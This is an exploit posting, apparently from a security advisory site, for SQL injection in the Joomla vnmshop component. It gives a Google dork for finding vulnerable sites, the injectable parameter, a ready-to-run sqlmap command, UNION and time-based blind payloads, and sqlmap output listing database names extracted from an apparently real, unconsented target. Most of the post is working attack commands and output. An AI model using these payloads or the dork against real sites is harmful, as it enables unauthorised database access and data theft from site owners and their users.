Joomla vnmshop SQL Injection

2015.09.21
Credit: Đầu Lâu
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: joomla vnmshop sql injection # Google Dork: inurl:option=com_vnmshop # Date: 16/09/2015 # Exploit Author: Đầu Lâu # Vendor Homepage: ... # Version: all version # Tested on: kali linux link vuln: site.com/index.php?option=com_vnmshop&Itemid=211&catid=78%27 POC: sqlmap -u "http://xxx/index.php?option=com_vnmshop&Itemid=211&catid=78*" --dbs _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150901} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 19:16:12 custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y [19:16:13] [INFO] resuming back-end DBMS 'mysql' [19:16:13] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Parameter: #1* (URI) Type: UNION query Title: MySQL UNION query (NULL) - 8 columns Payload: http://xxx:80/index.php?option=com_vnmshop&Itemid=211&catid=78 UNION ALL SELECT CONCAT(0x71767a7671,0x48754841415165534653,0x7176767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: http://xxx:80/index.php?option=com_vnmshop&Itemid=211&catid=78 AND (SELECT * FROM (SELECT(SLEEP(5)))lnPA) --- [19:16:14] [INFO] the back-end DBMS is MySQL web application technology: Apache, PHP 5.2.17 back-end DBMS: MySQL 5.0.11 [19:16:14] [INFO] fetching database names available databases [7]: [*] information_schema [*] sabrina_dieuhoahn [*] sabrina_onaudio [*] sabrina_phubinh [*] sabrina_sonlam [*] sabrina_thienduc [*] sabrina_xulynuoc


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top